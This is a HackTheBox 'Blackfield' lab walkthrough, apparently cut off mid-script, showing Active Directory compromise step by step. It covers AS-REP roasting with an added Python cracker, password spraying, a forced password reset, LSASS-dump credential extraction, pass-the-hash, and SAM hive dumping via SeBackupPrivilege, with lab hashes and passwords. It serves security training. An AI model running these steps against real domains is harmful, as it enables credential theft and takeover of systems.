In this walkthrough, we will go through the Blackfield room from HackTheBox. The room is rated Hard on the platform and consists of exploiting Windows and Active Directory misconfigurations to get initial access. For privilege escalation, the Backup Operators group privilege (SeBackupPrivilege) is abused to get SYSTEM. So, let's get started without any delay.
Machine Info:
| Field | Value |
| --- | --- |
| Title | Blackfield |
| IP address | 10.10.10.192 |
| Difficulty | Hard |
| OS | Windows |
| Description | Blackfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations. |
Enumeration:
- I started with my usual aggressive nmap scan and found several open ports. The highlights were port 88 (Kerberos), which tells us we are dealing with an Active Directory domain controller, along with ports 139 and 445 (SMB), 389 and 3268 (LDAP and the Global Catalog) and 135/593 (RPC). Also note the reported clock skew of roughly seven hours between my machine and the DC: Kerberos only tolerates a few minutes of skew by default, so this is worth keeping in mind for anything that authenticates with Kerberos later on.
$ sudo nmap -A 10.10.10.192
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-14 11:11 IST
Nmap scan report for 10.10.10.192
Host is up (0.21s latency).
Not shown: 993 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-14 12:41:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-12-14T12:42:01
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   207.26 ms 10.10.14.1
2   208.09 ms 10.10.10.192

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.83 seconds
- The nmap results also reveal the domain name, BLACKFIELD.local, so I added it to my /etc/hosts file.
- Tried to enumerate usernames through RPC and LDAP without credentials, but had no luck.
- Next, pivoted to SMB enumeration and listed the shares with a null session:
smbclient -L 10.10.10.192
- This turned up an interesting share, profiles$, which is readable anonymously.
- Peeked inside profiles$ and found a long list of per-user profile directories, which make a good candidate username list. Saved the directory names to a file called usernames.txt on my local machine.
$ smbclient //10.10.10.192/profiles$
Password for [WORKGROUP\wh1terose]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  3 22:17:12 2020
  ..                                  D        0  Wed Jun  3 22:17:12 2020
  AAlleni                             D        0  Wed Jun  3 22:17:11 2020
  ABarteski                           D        0  Wed Jun  3 22:17:11 2020
  ABekesz                             D        0  Wed Jun  3 22:17:11 2020
  ABenzies                            D        0  Wed Jun  3 22:17:11 2020
  ABiemiller                          D        0  Wed Jun  3 22:17:11 2020
  AChampken                           D        0  Wed Jun  3 22:17:11 2020
  ACheretei                           D        0  Wed Jun  3 22:17:11 2020
  ACsonaki                            D        0  Wed Jun  3 22:17:11 2020
-- snipped --
$ cat usernames.txt
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
ACsonaki
AHigchens
AJaquemai
AKlado
AKoffenburger
AKollolli
AKruppe
AKubale
ALamerz
--- snipped --
Performing the AS-REP roasting attack
- With the harvested usernames, I tried AS-REP roasting: for any account that has Kerberos pre-authentication disabled, the KDC hands out an AS-REP containing data encrypted with the user's password-derived key without us proving knowledge of the password, and that blob can be cracked offline. Accounts that do not exist come back as KDC_ERR_C_PRINCIPAL_UNKNOWN, so the output also tells us which of the harvested names are real domain users. Got a hit for support.
python3 ~/Tools/impacket/examples/GetNPUsers.py -no-pass -usersfile usernames.txt -dc-ip 10.10.10.192 'BLACKFIELD.LOCAL/'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
-- snipped --
$krb5asrep$23$support@BLACKFIELD.LOCAL:4a9e0763e700c5be596a5dd120f6962c$709b4e186f3a9b346052cc0f14286ba73dfc155327e9cea337bdcd0ef47f1fd54b13578d868209a171fc76c29220607db8182bbfdd1c479291578a21cc1ccf556f3f79c0cae6ce1951f765af242649261a87bf262e6b3e56ccc40e35a15f980d2469e968429c51a54e616d37e9fea4ed0430b38cb5e5c16c82151876029a816cdff290a0204f5348ce7c47dd6e3eeefead7839ed7cdd2f713bc56b1e086069e0475b7cb885582331c48e275c4a16145382a014306221f39dcf60ac071318ce6280452bf628288395f339d6c983469177547227464a44a9816ce4851310123453dde56b9c1e0aeeb8db9530586cad4614a6f5fca8
-- snipped --
- Cracked the captured AS-REP hash with hashcat (mode 18200) against rockyou and found the password for support: #00^BlackKnight.
hashcat -m 18200 hash.txt rockyou.txt -O
support: #00^BlackKnight
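To show what hashcat is doing in mode 18200, and why a single AS-REP is enough to crack a password offline, here is an added example; it is not code from the original post, nor from Impacket or hashcat. It implements the RC4-HMAC (etype 23) check from RFC 4757 with a pure-Python MD4, because many OpenSSL 3 builds of hashlib no longer provide md4. Since a real AS-REP cannot be requested offline, the script constructs its own sample hash line from a known password; the fixed confounder, the placeholder plaintext and the short wordlist are all assumptions made for the example. Given the line GetNPUsers printed above and a real wordlist, crack() returns the same answer hashcat does.

```python
"""Offline AS-REP roast check, i.e. what hashcat -m 18200 does per candidate password.

Added example for this walkthrough; not code from the original post, Impacket or hashcat.
Input format is the line GetNPUsers prints: $krb5asrep$23$user@REALM:checksum$edata
(etype 23 = RC4-HMAC, RFC 4757). The sample hash below is constructed locally.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional, Tuple

MASK = 0xFFFFFFFF
AS_REP_USAGE = 8  # key usage number for the AS-REP encrypted part (RFC 4120)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is missing on many OpenSSL 3 builds."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & MASK

    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a = rol((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rol((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rol((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it doubles as the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def asrep_encrypt(nt: bytes, plaintext: bytes, confounder: bytes) -> Tuple[bytes, bytes]:
    """RFC 4757 encryption as the KDC does it: K1 = HMAC(K, usage), checksum over
    confounder||data, K3 = HMAC(K1, checksum), RC4(K3). Returns (checksum, ciphertext)."""
    k1 = _hmac_md5(nt, struct.pack("<I", AS_REP_USAGE))
    edata = confounder + plaintext
    checksum = _hmac_md5(k1, edata)
    return checksum, rc4(_hmac_md5(k1, checksum), edata)


def asrep_check(nt: bytes, checksum: bytes, ciphertext: bytes) -> bool:
    """Candidate test: rebuild K3 from the checksum, decrypt, recompute the checksum."""
    k1 = _hmac_md5(nt, struct.pack("<I", AS_REP_USAGE))
    plaintext = rc4(_hmac_md5(k1, checksum), ciphertext)
    return hmac.compare_digest(_hmac_md5(k1, plaintext), checksum)


def parse_hash_line(line: str) -> Tuple[str, bytes, bytes]:
    """Split '$krb5asrep$23$user@REALM:checksum$edata' into (principal, checksum, edata)."""
    prefix, rest = line.strip().split(":", 1)
    if not prefix.startswith("$krb5asrep$23$"):
        raise ValueError("expected an etype-23 AS-REP line as printed by GetNPUsers")
    checksum_hex, edata_hex = rest.split("$", 1)
    return prefix[len("$krb5asrep$23$"):], bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first wordlist entry whose NT hash verifies the AS-REP, or None."""
    _, checksum, edata = parse_hash_line(line)
    for candidate in wordlist:
        if asrep_check(nt_hash(candidate), checksum, edata):
            return candidate
    return None


def make_sample_line(user: str, realm: str, password: str) -> str:
    """Constructed stand-in for a KDC response so the script runs offline: the plaintext is
    not a real EncASRepPart and the confounder is fixed instead of random (assumptions)."""
    plaintext = b"\x79\x82" + b"constructed EncASRepPart placeholder"
    checksum, ct = asrep_encrypt(nt_hash(password), plaintext, b"\x11" * 8)
    return "$krb5asrep$23$%s@%s:%s$%s" % (user, realm, checksum.hex(), ct.hex())


if __name__ == "__main__":
    sample = make_sample_line("support", "BLACKFIELD.LOCAL", "#00^BlackKnight")
    print(sample)
    print("cracked:", crack(sample, ["password", "Welcome1", "#00^BlackKnight"]))
```

The check costs one MD4, three HMAC-MD5s and one RC4 pass per candidate, which is why RC4-HMAC AS-REPs crack so quickly on a GPU; the fix on the domain side is to remove "Do not require Kerberos preauthentication" from the account and, where possible, disable RC4 for it.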
- Next, I checked the credentials against the domain with crackmapexec to confirm they are valid and got a green flag in the output.
crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
- Tried to get a shell over WinRM with these credentials, but was unable to do so.
- I also sprayed the found password across the usernames in usernames.txt. Got a hit for AAlleni, but still wasn't able to get a shell with that account either.
crackmapexec smb 10.10.10.192 -u usernames.txt -p '#00^BlackKnight'
- Next, checked the SMB shares visible to support. There is an interesting one called forensic (comment: Forensic / Audit share), but support has no access to it yet.
smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.192...
[+] IP: 10.10.10.192:445        Name: BLACKFIELD.local
        Disk                                    Permissions     Comment
        ----                                    -----------     -------
        ADMIN$                                  NO ACCESS       Remote Admin
        C$                                      NO ACCESS       Default share
        forensic                                NO ACCESS       Forensic / Audit share.
-- snipped --
- I also added the DC01.blackfield.local to my /etc/hosts file in order to avoid any host resolution issues later.
Enumeration with Bloodhound.py
- I hit a dead end here for a while. Next, I ran BloodHound.py with the support credentials to collect domain information from the DC over LDAP. Note the "Kerberos auth to LDAP failed, trying NTLM" lines: that is consistent with the clock skew seen in the nmap scan, and the collector falls back to NTLM on its own.
$ bloodhound-python -c all -u support -p '#00^BlackKnight' -d blackfield.local -gc blackfield.local -dc DC01.blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: DC01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
-- snipped --
- This produced a set of JSON files containing the collected data.
- Uploaded the files to BloodHound and analysed them. Looking at what the support user controls, under First Degree Object Control I found a ForceChangePassword edge from support to the user audit2020. This right (User-Force-Change-Password on the target object) lets support set a new password for audit2020 without knowing the current one, which gives us that account.
Exploiting ForceChangePassword (First Degree Object Control)
- Next, I used rpcclient to change the password of audit2020 (setuserinfo2 with information level 23 sets the password directly over SAMR) and verified the change by checking the new credentials against the DC with crackmapexec, which came back positive, so we are good to go. Keep in mind that on a real engagement this is a destructive action: the user's existing password is lost, so it needs to be agreed with the client beforehand.
$ rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192
rpcclient $> setuserinfo2 audit2020 23 Password123
rpcclient $> exit
- Now I checked the shares as audit2020 and was able to read the contents of the forensic share.
$ smbmap -H 10.10.10.192 -u audit2020 -p 'Password123'
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.192...
[+] IP: 10.10.10.192:445        Name: blackfield.local
        Disk                                    Permissions     Comment
        ----                                    -----------     -------
        ADMIN$                                  NO ACCESS       Remote Admin
        C$                                      NO ACCESS       Default share
        .
        dr--r--r--                0 Sun Feb 23 20:40:16 2020    .
        dr--r--r--                0 Sun Feb 23 20:40:16 2020    ..
        dr--r--r--                0 Sun Feb 23 23:44:37 2020    commands_output
        dr--r--r--                0 Fri May 29 01:59:24 2020    memory_analysis
        dr--r--r--                0 Sat Feb 29 04:00:34 2020    tools
        forensic                                READ ONLY       Forensic / Audit share.
- Accessed the share with smbclient and found three directories holding forensic tools, saved command output and per-process memory dumps. Downloaded the ones that looked interesting to my local system.
$ smbclient //10.10.10.192/forensic --user audit2020 --password 'Password123'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 18:33:16 2020
  ..                                  D        0  Sun Feb 23 18:33:16 2020
  commands_output                     D        0  Sun Feb 23 23:44:37 2020
  memory_analysis                     D        0  Fri May 29 01:58:33 2020
  tools                               D        0  Sun Feb 23 19:09:08 2020

                5102079 blocks of size 4096. 1691114 blocks available
smb: \> cd commands_ouput
cd \commands_ouput\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd commands_output
smb: \commands_output\> ls
  .                                   D        0  Sun Feb 23 23:44:37 2020
  ..                                  D        0  Sun Feb 23 23:44:37 2020
  domain_admins.txt                   A      528  Sun Feb 23 18:30:19 2020
  domain_groups.txt                   A      962  Sun Feb 23 18:21:52 2020
  domain_users.txt                    A    16454  Sat Feb 29 04:02:17 2020
  firewall_rules.txt                  A   518202  Sun Feb 23 18:23:58 2020
  ipconfig.txt                        A     1782  Sun Feb 23 18:20:28 2020
  netstat.txt                         A     3842  Sun Feb 23 18:21:01 2020
  route.txt                           A     3976  Sun Feb 23 18:23:01 2020
  systeminfo.txt                      A     4550  Sun Feb 23 18:26:59 2020
  tasklist.txt                        A     9990  Sun Feb 23 18:24:29 2020

                5102079 blocks of size 4096. 1691114 blocks available
smb: \commands_output\> cd ..
smb: \> cd memory_analysis
smb: \memory_analysis\> ls
  .                                   D        0  Fri May 29 01:58:33 2020
  ..                                  D        0  Fri May 29 01:58:33 2020
  conhost.zip                         A 37876530  Fri May 29 01:55:36 2020
  ctfmon.zip                          A 24962333  Fri May 29 01:55:45 2020
  dfsrs.zip                           A 23993305  Fri May 29 01:55:54 2020
  dllhost.zip                         A 18366396  Fri May 29 01:56:04 2020
  ismserv.zip                         A  8810157  Fri May 29 01:56:13 2020
  lsass.zip                           A 41936098  Fri May 29 01:55:08 2020
  mmc.zip                             A 64288607  Fri May 29 01:55:25 2020
  RuntimeBroker.zip                   A 13332174  Fri May 29 01:56:24 2020
  ServerManager.zip                   A 131983313  Fri May 29 01:56:49 2020
  sihost.zip                          A 33141744  Fri May 29 01:57:00 2020
  smartscreen.zip                     A 33756344  Fri May 29 01:57:11 2020
  svchost.zip                         A 14408833  Fri May 29 01:57:19 2020
  taskhostw.zip                       A 34631412  Fri May 29 01:57:30 2020
  winlogon.zip                        A 14255089  Fri May 29 01:57:38 2020
  wlms.zip                            A  4067425  Fri May 29 01:57:44 2020
  WmiPrvSE.zip                        A 18303252  Fri May 29 01:57:53 2020

                5102079 blocks of size 4096. 1691114 blocks available
smb: \memory_analysis\> cd ..
smb: \> cd tools
smb: \tools\> ls
  .                                   D        0  Sun Feb 23 19:09:08 2020
  ..                                  D        0  Sun Feb 23 19:09:08 2020
  sleuthkit-4.8.0-win32               D        0  Sun Feb 23 19:09:03 2020
  sysinternals                        D        0  Sun Feb 23 19:05:25 2020
  volatility                          D        0  Sun Feb 23 19:05:39 2020

                5102079 blocks of size 4096. 1691114 blocks available
smb: \commands_output\> prompt off
smb: \commands_output\> recurse on
smb: \commands_output\> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (1.1 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (18.9 KiloBytes/sec) (average 6.9 KiloBytes/sec)
getting file \commands_output\firewall_rules.txt of size 518202 as firewall_rules.txt (292.3 KiloBytes/sec) (average 122.5 KiloBytes/sec)
getting file \commands_output\ipconfig.txt of size 1782 as ipconfig.txt (2.1 KiloBytes/sec) (average 102.7 KiloBytes/sec)
getting file \commands_output\netstat.txt of size 3842 as netstat.txt (4.4 KiloBytes/sec) (average 88.8 KiloBytes/sec)
getting file \commands_output\route.txt of size 3976 as route.txt (4.5 KiloBytes/sec) (average 78.1 KiloBytes/sec)
getting file \commands_output\systeminfo.txt of size 4550 as systeminfo.txt (5.3 KiloBytes/sec) (average 70.2 KiloBytes/sec)
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (11.4 KiloBytes/sec) (average 64.3 KiloBytes/sec)
- Looked into one of the files that seemed interesting, domain_admins.txt, and found that a user named Ipwn3dYourCompany is also a Domain Admin.
- The next interesting file was lsass.zip. This caught my eye because the LSASS process holds the logon credentials (NT hashes, Kerberos keys and sometimes cleartext passwords) of every session that was active when the dump was taken, so a memory dump of it is as good as running Mimikatz on the box. After unzipping the archive I found lsass.DMP, a minidump of the lsass process.
unzip lsass.zip
- Used pypykatz to parse the minidump and found, among other things, the NT hashes of svc_backup and Administrator, plus the DC01$ machine-account hash and its cleartext password.
$ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef621
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
== LogonSession ==
authentication_id 365835 (5950b)
session_id 2
username UMFD-2
domainname Font Driver Host
logon_server
logon_time 2020-02-23T17:59:38.218491+00:00
sid S-1-5-96-0-2
luid 365835
        == MSV ==
                Username: DC01$
                Domain: BLACKFIELD
                LM: NA
                NT: b624dc83a27cc29da11d9bf25efea796
                SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
                DPAPI: NA
        == WDIGEST [5950b]==
                username DC01$
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: DC01$
                Domain: BLACKFIELD.local
                Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
                password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
        == WDIGEST [5950b]==
                username DC01$
                domainname BLACKFIELD
                password None
                password (hex)
-- snipped: the same DC01$ machine-account NT hash and password repeat in the other Font Driver Host, Window Manager, NETWORK SERVICE and SYSTEM sessions --
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
        == MSV ==
                Username: Administrator
                Domain: BLACKFIELD
                LM: NA
                NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
                SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
                DPAPI: 240339f898b6ac4ce3f34702e4a89550
        == WDIGEST [25869]==
                username Administrator
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: Administrator
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [25869]==
                username Administrator
                domainname BLACKFIELD
                password None
                password (hex)
        == DPAPI [25869]==
                luid 153705
                key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
                masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
                sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9
-- snipped --
== LogonSession ==
authentication_id 406499 (633e3)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406499
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef621
        == WDIGEST [633e3]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [633e3]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
        == DPAPI [633e3]==
                luid 406499
                key_guid 836e8326-d136-4b9f-94c7-3353c4e45770
                masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf
                sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991
-- snipped --
== LogonSession ==
authentication_id 999 (3e7)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server
logon_time 2020-02-23T17:57:44.913221+00:00
sid S-1-5-18
luid 999
        == WDIGEST [3e7]==
                username DC01$
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: dc01$
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [3e7]==
                username DC01$
                domainname BLACKFIELD
                password None
                password (hex)
        == DPAPI [3e7]==
                luid 999
                key_guid 0f7e926c-c502-4cad-90fa-32b78425b5a9
                masterkey ebbb538876be341ae33e88640e4e1d16c16ad5363c15b0709d3a97e34980ad5085436181f66fa3a0ec122d461676475b24be001736f920cd21637fee13dfc616
                sha1_masterkey ed834662c755c50ef7285d88a4015f9c5d6499cd
        == DPAPI [3e7]==
                luid 999
                key_guid f611f8d0-9510-4a8a-94d7-5054cc85a654
                masterkey 7c874d2a50ea2c4024bd5b24eef4515088cf3fe21f3b9cafd3c81af02fd5ca742015117e7f2675e781ce7775fcde2740ae7207526ce493bdc89d2ae3eb0e02e9
                sha1_masterkey cf1c0b79da85f6c84b96fd7a0a5d7a5265594477
        == DPAPI [3e7]==
                luid 999
                key_guid 31632c55-7a7c-4c51-9065-65469950e94e
                masterkey 825063c43b0ea082e2d3ddf6006a8dcced269f2d34fe4367259a0907d29139b58822349e687c7ea0258633e5b109678e8e2337d76d4e38e390d8b980fb737edb
                sha1_masterkey 6f3e0e7bf68f9a7df07549903888ea87f015bb01
        == DPAPI [3e7]==
                luid 999
                key_guid 7e0da320-072c-4b4a-969f-62087d9f9870
                masterkey 1fe8f550be4948f213e0591eef9d876364246ea108da6dd2af73ff455485a56101067fbc669e99ad9e858f75ae9bd7e8a6b2096407c4541e2b44e67e4e21d8f5
                sha1_masterkey f50955e8b8a7c921fdf9bac7b9a2483a9ac3ceed
svc_backup: 9658d1d1dcd9250115e2205d9f48400d
Administrator: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Initial Access:
- Sprayed both NTLM hashes against the DC with crackmapexec; only svc_backup came back green (valid).
crackmapexec smb 10.10.10.192 -u "Administrator" -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
crackmapexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
- Used Evil-WinRM with the svc_backup hash to get an initial foothold and captured the user flag.
evil-winrm.rb -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
- I was able to peek inside the Administrator home directory but was unable to capture the root flag.
- Next, I checked the privileges of our current user and found an interesting one enabled: SeBackupPrivilege.
whoami /all
- Also looked at a notes.txt file in the C:\ directory, which gives some hints about a backup being performed.
- Looked at the account information for svc_backup and found that it is a member of the "Backup Operators" group. With SeBackupPrivilege enabled and Backup Operators membership, we can escalate our privileges by backing up the SAM or the NTDS.dit file and then dumping password hashes from it. So, let's do that.
net user svc_backup
Privilege Escalation:
- Created a directory named Temp and used reg save to write copies of the SAM and SYSTEM registry hives into it.
cd Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
- Downloaded the files to our local machine. This might take a while.
- Used pypykatz to parse the SAM and SYSTEM hives and dumped the local account hashes.
pypykatz registry --sam sam system
HBoot Key: 1d645695662cc2a70d54ee626104485110101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
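As an added example (not part of the original write-up), here is a small Python parser for the pwdump-style lines that pypykatz and secretsdump.py print. It splits each line into its fields, flags accounts whose NT hash is the well-known hash of the empty password, flags any stored LM hash, and groups accounts that share an NT hash (i.e. the same password). The sample input reuses the SAM lines shown above; the helper names parse_pwdump and audit are my own.

```python
import re
from collections import defaultdict

# Well-known constants (NTLM facts, not page-specific values):
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty password (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string: no password set

# pwdump line layout printed by pypykatz/secretsdump: user:rid:lmhash:nthash:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_pwdump(text):
    """Parse pwdump-format lines into account dicts; non-matching lines (headers) are skipped."""
    accounts = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue  # e.g. the 'HBoot Key:' header line
        lm, nt = m["lm"].lower(), m["nt"].lower()
        accounts.append({
            "user": m["user"],
            "rid": int(m["rid"]),
            "lm": lm,
            "nt": nt,
            "lm_blank": lm == EMPTY_LM,
            "nt_blank": nt == EMPTY_NT,
        })
    return accounts


def audit(accounts):
    """Return findings a password audit would act on: blank passwords, LM hashes, shared passwords."""
    findings = []
    by_nt = defaultdict(list)
    for a in accounts:
        if a["nt_blank"]:
            findings.append(f"{a['user']} (RID {a['rid']}): empty password")
        if not a["lm_blank"]:
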